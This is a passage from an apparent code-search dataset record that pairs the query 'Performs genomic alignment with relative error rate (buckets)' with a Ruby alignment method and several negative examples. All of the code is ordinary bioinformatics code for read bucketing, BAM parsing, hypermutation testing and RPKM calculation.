end\n\n column_specified = false\n target_column = target_column.to_i\n \n colname = header[target_column].name\n if colname =~ /geo/i then\n fr_puts \"Using existing GEOid column #{colname}\"\n else\n fr_puts \"Using protocol #{header[target_column].split_example}.\"\n column_specified = true\n end\n\n # if it's not geo, use it as protocol:\n if( column_specified ) then \n \n # get previous_protocol (ie target) and the one after it\n previous_protocol = header[target_column]\n previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = header.slice(target_column +1, header.length).find{|col| col.heading =~ /Protocol REF/i}\n next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n\n\n geo_record = SDRFHeader.new(\"Result Value\", \"geo record\") # make a new column\n # populate the geo record\n gsms.each_index{|i|\n geo_record.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_record.values.join(\", \") \n i = next_protocol.nil? ? header.size : header.find_index(next_protocol)\n header.insert(i, geo_record)\n fr_puts \" Attach GEO IDs to protocol: '#{previous_protocol.to_s}'\" \n else # there must be a geo colunn\n\n # finding a geo header index.\n geo_header_idx = s.find_index { |h| h.name =~ /geo/i }\n\n if geo_header_idx then\n previous_protocol = s.slice(geo_header_idx, s.length).find { |col| col.heading =~ /Protocol REF/i }; previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = s.slice(0, geo_header_idx).reverse.find { |col| col.heading =~ /Protocol REF/i }; next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n # Attach GEO IDs to existing GEO ID column\n fr_puts \" Found existing GEO ID column for #{pid} between: '#{previous_protocol_name.to_s}' AND '#{next_protocol_name.to_s}'\" \n sdrf_rows = s[geo_header_idx].rows\n geo_header_col = s[geo_header_idx]\n\n if sdrf_rows != gsms.size then\n raise Exception.new(\"Can't match #{sdrf_rows} SDRF rows to #{gsms.size} GEO ids!\")\n \n ## Attach GEO IDs, lining up duplicates with the previous row in the SDRF with the appropriate number of unique values\n #fr_puts \" There are more rows in the SDRF than GSM IDs: #{sdrf_rows} != #{gsms.size}.\" \n # Have to line this up carefully\n #uniq_rows = enough_replicates_at.uniq_rows\n #fr_puts \" Unique rows for #{enough_replicates_at.heading} [#{enough_replicates_at.name}]: \" + uniq_rows.pretty_inspect \n #geo_header_col.values.clear\n #uniq_rows.each_index { |is_idx|\n # uniq_rows[is_idx].each { |i|\n # geo_header_col.values[i] = gsms[is_idx]\n # }\n #}\n #fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n else\n # Attach GEO IDs to the SDRF in order\n geo_header_col.values.clear\n gsms.each_index { |i|\n geo_header_col.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n end\n geo_record = geo_header_col\n else # No protocol column and no geo header idx. should never happen.\n raise Exception.new(\"No protocol column or existing GEO column was specified. This should never happen!\")\n end\n end\n\n # If batchmode, make the project's subfolder within out\n output_sdrfdir = @batchmode ? File.join(output_basedir.path, pid.to_s) : output_basedir.path \n FileUtils.mkdir_p(output_sdrfdir)\n out_sdrf = File.join(output_sdrfdir, File.basename(sdrf))\n\n # Create new SDRF, overwriting existing sdrf only if not in batchmode\n print_sdrf(header, out_sdrf, !@batchmode)\n\n info[:geo_header_col] = geo_header_col\n info[:geo_record] = geo_record\n info[:previous_protocol_name] = previous_protocol_name\n\n # stick info in the hash to be remembered\n all_infos << info\n # Write a marshal file\n marshal_filename = GEOID_MARSHAL\n out_marshal = File.join(output_sdrfdir, marshal_filename) \n marshal_file = File.new(out_marshal, \"w\")\n marshal_file.puts(Marshal.dump(info))\n marshal_file.close\n \n marshal_list.puts File.join(pid.to_s, marshal_filename) if @batchmode \n \n } \n \n marshal_list.close if @batchmode\n \n # Then, run the database stuff on all_infos\n attached_geoids = update_db(all_infos, no_db_commits)\n attached_geoids\n end"
] |
[
"0.6870922",
"0.64567596",
"0.6185963",
"0.601857",
"0.5963206",
"0.59329545",
"0.5902964",
"0.58885527",
"0.5840516",
"0.5804533",
"0.57673323",
"0.5726356",
"0.57167673",
"0.5711429",
"0.5706999",
"0.56836855",
"0.5670119",
"0.56245196",
"0.5620191",
"0.56082445",
"0.5604751",
"0.55904263",
"0.5559772",
"0.555126",
"0.5546442",
"0.55460584",
"0.5536094",
"0.5511573",
"0.5477689",
"0.544464",
"0.54142714",
"0.5352776",
"0.531028",
"0.5303957",
"0.5297002",
"0.5280983",
"0.524484",
"0.52319235",
"0.5226835",
"0.5218394",
"0.52059186",
"0.5150769",
"0.514313",
"0.5119421",
"0.5111732",
"0.51100534",
"0.50980854",
"0.5096465",
"0.50856876",
"0.5043662",
"0.50259215",
"0.50234497",
"0.50195396",
"0.50139624",
"0.5005188",
"0.5001924",
"0.4991363",
"0.49864432",
"0.49804854",
"0.49804854",
"0.4974494",
"0.49677533",
"0.49669087",
"0.4960447",
"0.494649",
"0.49378258",
"0.49326998",
"0.49320856",
"0.4925928",
"0.49226964",
"0.4918998",
"0.4918828",
"0.49175927",
"0.49171984",
"0.49063405",
"0.49044597",
"0.49021482",
"0.489316",
"0.48779386",
"0.4864052",
"0.486145",
"0.48598382",
"0.48450837",
"0.48439533",
"0.48411447",
"0.48356745",
"0.48318473",
"0.48272744",
"0.4819107",
"0.48141918",
"0.48059893",
"0.4805737",
"0.47975928",
"0.47950804",
"0.479042",
"0.47844592",
"0.47630545",
"0.4757485",
"0.474794",
"0.4747441"
] |
0.47745046
|
96
|
Performs genomic alignment with relative error rate (buckets)
|
def bucketized_alignment
# split reads into buckets according to their size and err_rate
@buckets = bucketize(@err_rate)
# perform alignment on each bucket
@buckets.reverse_each do |lower, upper, mismatches|
@names.set_bucket(lower, upper)
mapped, unmapped = align(
@ref, @ref_base, @software,
{ annotation: @annotation,
tophat_aligner: @tophat_aligner,
mismatches: mismatches
}
)
@mapped_bams << mapped
@unmapped_bams << unmapped
@max_mismatches = [@max_mismatches, mismatches].max
end
# merge alignments
@names.unset_bucket
unbucketize(@mapped_bams, @names.get('mapped_merged'))
unbucketize(@unmapped_bams, @names.get('unmapped_merged'))
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def gags(options={})\n min_disagreeing_proportion = options[:min_disagreeing_proportion]\n min_disagreeing_proportion ||= 0.1\n min_disagreeing_absolute = options[:min_disagreeing_absolute]\n min_disagreeing_absolute ||= 3\n \n options[:acceptable_gag_errors] ||= DEFAULT_GAG_ERROR_CONTEXTS\n \n log = Bio::Log::LoggerPlus['bio-gag']\n \n piles = []\n gags = []\n \n each do |pile|\n options[:progressbar].inc unless options[:progressbar].nil?\n \n if piles.length < 2\n #log.debug \"Piles cache for this reference sequence less than length 2\"\n piles = [piles, pile].flatten\n next\n elsif piles.length < 3\n #log.debug \"Piles cache for this reference sequence becoming full\"\n piles = [piles, pile].flatten\n elsif piles[1].ref_name != pile.ref_name\n #log.debug \"Piles cache removed - moving to new contig\"\n piles = [pile]\n next\n else\n #log.debug \"Piles cache regular push through\"\n piles = [piles[1], piles[2], pile].flatten\n end\n log.debug \"Current piles now at #{piles[0].ref_name}, #{piles.collect{|pile| \"#{pile.pos}/#{pile.ref_base}\"}.join(', ')}\" if log.debug?\n \n # if not at the start/end of the contig\n first = piles[0]\n second = piles[1]\n third = piles[2]\n \n # Require particular sequences in the reference sequence\n ref_bases = \"#{first.ref_base.upcase}#{second.ref_base.upcase}#{third.ref_base.upcase}\"\n index = options[:acceptable_gag_errors].index(ref_bases)\n if index.nil?\n log.debug \"Sequence #{ref_bases} does not match whitelist, so not calling a gag\" if log.debug?\n next\n end\n gag_sequence = options[:acceptable_gag_errors][index]\n \n # all reads that have a single insertion after the first or second position, but not both \n inserting_reads = [first.reads, second.reads].flatten.uniq.select do |read|\n !(read.insertions[first.pos] and read.insertions[second.pos]) and\n (read.insertions[first.pos] or read.insertions[second.pos])\n end\n log.debug \"Inserting reads after filtering: #{inserting_reads.inspect}\" if log.debug?\n \n # ignore regions that aren't ever going to make it past the next filter\n if inserting_reads.length < min_disagreeing_absolute or inserting_reads.length.to_f/first.coverage < min_disagreeing_proportion\n log.debug \"Insufficient disagreement at step 1, so not calling a gag\" if log.debug?\n next\n end\n\n # what is the maximal base that is inserted and maximal number of directions\n direction_counts = {'+' => 0, '-' => 0}\n base_counts = {}\n inserting_reads.each do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n direction_counts[read.direction] += 1\n base_counts[insert] ||= 0\n base_counts[insert] += 1\n end\n log.debug \"Direction counts of insertions: #{direction_counts.inspect}\" if log.debug?\n log.debug \"Base counts of insertions: #{base_counts.inspect}\" if log.debug?\n max_direction = direction_counts['+']>direction_counts['-'] ? '+' : '-'\n max_base = base_counts.max do |a,b|\n a[1] <=> b[1]\n end[0]\n log.debug \"Picking max direction #{max_direction} and max base #{max_base}\" if log.debug?\n \n # Only accept positions that are inserting a single base\n if max_base.length > 1\n log.debug \"Maximal insertion is too long, so not calling a gag\" if log.debug?\n next\n end\n \n counted_inserts = inserting_reads.select do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n if read.direction == max_direction and insert == max_base\n # Remove reads that don't match the first and third bases like the consensus sequence\n read.sequence[read.sequence.length-1] == third.ref_base and\n read.sequence[read.sequence.length-3] == first.ref_base\n else\n false\n end\n end\n log.debug \"Reads counting after final filtering: #{counted_inserts.inspect}\" if log.debug?\n \n coverage = (first.coverage+second.coverage+third.coverage).to_f / 3.0\n coverage_percent = counted_inserts.length.to_f / coverage\n log.debug \"Final abundance calculations: max base #{max_base} (comparison base #{second.ref_base.upcase}) occurs #{counted_inserts.length} times compared to coverage #{coverage} (#{coverage_percent*10}%)\" if log.debug?\n if max_base != second.ref_base.upcase or # first and second bases must be the same \n counted_inserts.length < min_disagreeing_absolute or # require 3 bases in that maximal direction\n coverage_percent < min_disagreeing_proportion # at least 10% of reads with disagree with the consensus and agree with the gag\n log.debug \"Failed final abundance cutoffs, so not calling a gag\" if log.debug?\n next\n end\n \n # alright, gamut navigated. We have a match, record it\n gag = Bio::Gag.new(second.pos, piles, first.ref_name)\n gags.push gag\n log.debug \"Yielding gag #{gag.inspect}\"\n yield gag if block_given?\n end\n \n return gags\n end",
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def a3g_hypermut_seq_hash(seq_hash)\n #mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n #total G->A mutations at apobec3g/f positions.\n total = 0\n\n #make specimen consensus\n ref = consensus_without_alignment(seq_hash.values)\n\n #obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n seq_hash.each do |k,v|\n a = 0 #muts\n b = 0 #potential mut sites\n c = 0 #control muts\n d = 0 #potenrial controls\n mut.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = k + \",\" + a.to_s + \",\" + b.to_s + \",\" + c.to_s + \",\" + d.to_s + \",\" + rr.round(2).to_s + \",\" + perc.to_s\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if seq_hash.size > 20\n rate = total.to_f/(seq_hash.size)\n\n count_mut = count(mut_hash.values)\n maxi_count = count_mut.values.max\n\n poisson_hash = poisson_distribution(rate,maxi_count)\n\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = seq_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = {}\n hm_hash.keys.each do |k|\n hm_seq_hash[k] = seq_hash[k]\n end\n return [hm_seq_hash,hm_hash]\nend",
"def bucketize(error_rate)\n buckets = []\n run_cmd(\n \"fastq-bucketize #{@names.get('fp')} #{error_rate} \" \\\n \"2> #{@names.get('buckets')}\"\n )\n\n # parse buckets and compute corresponding absolute number of errors\n File.readlines(@names.get('buckets')).each do |line|\n next if line[0] == '#' # comment\n line = line.split.map(&:to_i)\n fail if (line[0] * error_rate).floor != (line[1] * error_rate).floor\n # push [lower bound, upper bound, absolute #errors]\n buckets.push([line[0], line[1], (line[0] * error_rate).floor]) \\\n unless line[1] < 14 # TODO: implement minlen option\n end\n\n buckets\n end",
"def computeRPKM(db, experiment, sample, gene_lengths)\n\tcounts = Hash.new\n\ttotal = 0\n\tdb.query(\"SELECT gene, SUM(counts) FROM exon_counts WHERE experiment=? AND sample=? GROUP BY gene\", experiment, sample).each do |row|\n\t\tgene, count = row\n\t\tcounts[gene] = count\n\t\ttotal += count\n\tend\n\tcounts.keys.each do |gene|\n\t\tgrpkm = rpkm(counts[gene], total, gene_lengths[gene])\n\t\tdb.query(\"INSERT INTO gene_counts VALUES(?,?,?,?,?)\", experiment, sample, gene, counts[gene], grpkm)\n\tend\nend",
"def exec_iter_fixed_alpha aggrStats\n iterStats = RunInfo.new\n iterConsensus = Hash.new {|hash, key| hash[key] = 0 }\n \n # NUMBER_OF_ITER times do\n $NUM_AVG_ITER.times do |i| \n # randomly withhold 20% of data\n pick_patients\n \n # find G'\n cover = exec_search \"nCOP_heruistic\"\n \n # store the stats\n iterStats.fillIn cover\n\n # add the cover to the consensus list\n add_to_consensus(iterConsensus, cover)\n end\n \n # compute the average and std for this set of iterations\n aggrStats.fillAggregateStats iterStats\n aggrStats.alpha << $ALPHA\n aggrStats.beta << $BETA\n\n # remember the frequency genes occured\n $selected_genes = iterConsensus\nend",
"def coverage\n if Experiment.find(params[:id]).uses_bam_file #return a pileup from samtools...\n\n else #return a position keyed hash of Positions objects\n features = Feature.find_in_range(params[:reference_id], params[:start], params[:end], params[:id])\n sequence = Reference.find(params[:reference_id]).sequence.sequence[params[:start].to_i - 1, (params[:end].to_i - params[:start].to_i)]\n positions = SimpleDepth.new(params[:start], params[:end], sequence, features)\n #comp_hash = {'A' => 'T', 'T' => 'A', 'G' => 'C', 'C' => 'G', 'N' => 'N'}\n #positions = Hash.new {|h,k| h[k] = {\n # '+' => {\n # 'A' => 0,\n # 'T' => 0,\n # 'G' => 0,\n # 'C' => 0,\n # 'N' => 0,\n # 'strand_total' => 0\n # },\n # '-' => {\n # 'A' => 0,\n # 'T' => 0,\n # 'G' => 0,\n # 'C' => 0,\n # 'N' => 0,\n # 'strand_total' => 0\n # },\n # 'position_total' => 0\n # }\n #}\n #positions['region_total'] = 0\n #positions['1'] = 1\n #features = Feature.find_in_range_no_overlap(params[:reference_id],params[:start],params[:end],params[:id])\n #features.each do |f|\n # if (f.sequence.match(/\\w/))\n # (f.start .. f.end - 1).each_with_index do |i, idx|\n # positions[i][f.strand][f.sequence[idx,1]] += 1\n # positions[i][f.strand]['strand_total'] += 1\n # positions[i]['position_total'] += 1\n # positions['region_total'] += 1\n # end\n # end\n end\n respond(positions)\n end",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def align_global(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = @@d * i\n end\n for j in 0..y\n tab[0][j] = @@d * j\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert].max\n end\n end\n\n @table = tab\n value = tab[x][y]\n EvaluatedProtein.new(protein, value)\n end",
"def sequence_check_for_submission(sequence,group_hash,reversed_group_hash)\n\n result_array = Array.new\n aa_threshold = 0.9\n \n begin\n \n query = Bio::FastaFormat.new( sequence )\n query_name = query.definition\n sequence = query.to_seq\n\n existing_matched_group_exist = CustomizedProteinSequence.find_by(:chain => sequence.seq)\n if !existing_matched_group_exist.nil? # find existing sequence\n result_array << collection(query_name, \"WARN\", \"Your sequence exists in our database. Common Name: #{existing_matched_group_exist.header} \")\n return result_array\n end\n\n sequence.auto # Guess the type of sequence. Changes the class of sequence.\n query_sequence_type = sequence.seq.class == Bio::Sequence::AA ? 'protein' : 'gene'\n\n program = 'blastp'\n database = 'reductive_dehalogenase_protein'\n blast_options = get_blast_options\n\n\n blaster = Bio::Blast.local( program, \"#{Rails.root}/index/blast/#{database}\", blast_options)\n aa_report = blaster.query(sequence.seq) # sequence.seq automatically remove the \\n; possibly other wildcard\n aa_similarity = aa_report.hits().length.to_f / aa_report.db_num().to_f\n identity_with_90 = check_alignment_identity(aa_report, 90) # identity_with_90 contains all the header that share >=90% identity\n\n # group_hash => group : Array {seq_definition}\n # reversed_group_hash = seq_definition : group\n if identity_with_90.length > 0\n identified_group_at_aa_level = get_identified_group(identity_with_90,group_hash,reversed_group_hash) # identified_group_at_aa_level contains confirmed group in aa level \n else\n # if identity_with_90.length == 0; no RD with ~=90% identity => create new RD groups\n\n if aa_similarity >= aa_threshold\n last_group = CustomizedProteinSequence.group(:group).order(:group).last.group\n new_group_number = last_group + 1\n result_array << collection(query_name,\"NEW\", \"Your sequence belongs to a new RD group: #{new_group_number}\",new_group_number)\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity of any sequences in database at amino acid level.\")\n end\n\n return result_array\n end\n\n if identified_group_at_aa_level.length > 0\n result_array << collection(query_name, \"SUCCESS\",\"Your sequence belongs RD group: #{identified_group_at_aa_level.join(\",\")}\",identified_group_at_aa_level.join(\",\"))\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity with all representatives of the group at amino acid level.\")\n end\n\n return result_array\n \n rescue => exception\n # puts exception\n result_array << collection(query_name, \"ERROR\",\"Your sequence is not validated. Or send it to our lab for manual checking.\")\n end\n \n return result_array\n\n end",
"def fix_gags(hash_of_sequence_ids_to_sequence_strings, sequence_id_to_gags={})\n log = Bio::Log::LoggerPlus['bio-gag']\n \n # Get the gags\n if sequence_id_to_gags == {}\n log.info \"Predicting gags from the pileup\"\n gags do |gag|\n sequence_id_to_gags[gag.ref_name] ||= []\n sequence_id_to_gags[gag.ref_name].push gag\n end\n else\n log.info \"Using pre-specified GAG errors\"\n end\n log.info \"Found #{sequence_id_to_gags.values.flatten.length} gag errors to fix\"\n \n # Make sure all gag errors in the pileup map to a sequence input fasta file by keeping tally\n accounted_for_seq_ids = []\n fixed_sequences = {} #Hash of sequence ids to sequences without gag errors\n hash_of_sequence_ids_to_sequence_strings.each do |seq_id, seq|\n log.debug \"Now attempting to fix sequence #{seq_id}, sequence #{seq}\"\n toilet = sequence_id_to_gags[seq_id]\n if toilet.nil?\n # No gag errors found in this sequence (or pessimistically the sequence wasn't in the pileup -leaving that issue to the user though)\n fixed_sequences[seq_id] = seq\n else\n # Gag error found at least once somewhere in this sequence\n # Record that this was touched in the pileup\n accounted_for_seq_ids.push seq_id\n \n # Output the fixed-up sequence\n last_gag = 0\n fixed = ''\n toilet.sort{|a,b| a.position<=>b.position}.each do |gag|\n #log.debug \"Attempting to fix gag at position #{gag.position} in sequence #{seq_id}, which is #{seq.length} bases long\"\n fixed = fixed+seq[last_gag..(gag.position-1)]\n fixed = fixed+seq[(gag.position-1)..(gag.position-1)]\n last_gag = gag.position\n #log.debug \"After fixing gag at position #{gag.position}, fixed sequence is now #{fixed}\"\n end\n fixed = fixed+seq[last_gag..(seq.length-1)]\n fixed_sequences[seq_id] = fixed\n end\n end\n \n unless accounted_for_seq_ids.length == sequence_id_to_gags.length\n log.warn \"Unexpectedly found GAG errors in sequences that weren't in the sequence that are to be fixed: Found gags in #{sequence_id_to_gags.length}, but only fixed #{accounted_for_seq_ids.length}\"\n end\n return fixed_sequences\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def a3g_hypermut(ref = nil)\n # mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n # total G->A mutations at apobec3g/f positions.\n total = 0\n\n unless ref \n # make consensus sequence for the input sequence hash\n ref = self.consensus\n end\n\n # obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n self.dna_hash.each do |k,v|\n a = 0 # muts\n b = 0 # potential mut sites\n c = 0 # control muts\n d = 0 # potenrial controls\n mut.each do |n|\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = ViralSeq::Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = [k, a, b, c, d, rr.round(2), perc]\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if self.dna_hash.size > 200\n rate = total.to_f/(self.dna_hash.size)\n count_mut = mut_hash.values.count_freq\n maxi_count = count_mut.values.max\n poisson_hash = ViralSeq::Math::PoissonDist.new(rate,maxi_count).poisson_hash\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = self.dna_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = ViralSeq::SeqHash.new\n hm_hash.each do |k,_v|\n hm_seq_hash.dna_hash[k] = self.dna_hash[k]\n end\n \n hm_seq_hash.title = self.title + \"_hypermut\"\n hm_seq_hash.file = self.file\n filtered_seq_hash = self.sub(self.dna_hash.keys - hm_hash.keys)\n return { a3g_seq: hm_seq_hash,\n filtered_seq: filtered_seq_hash,\n stats: hm_hash.values\n }\n end",
"def rpkm(counts, total_mapped_reads, gene_length)\n if counts && gene_length\n sprintf(\"%.2f\",(1e9*counts.to_f)/(total_mapped_reads*gene_length)).to_f\n else\n 0.0\n end\nend",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == 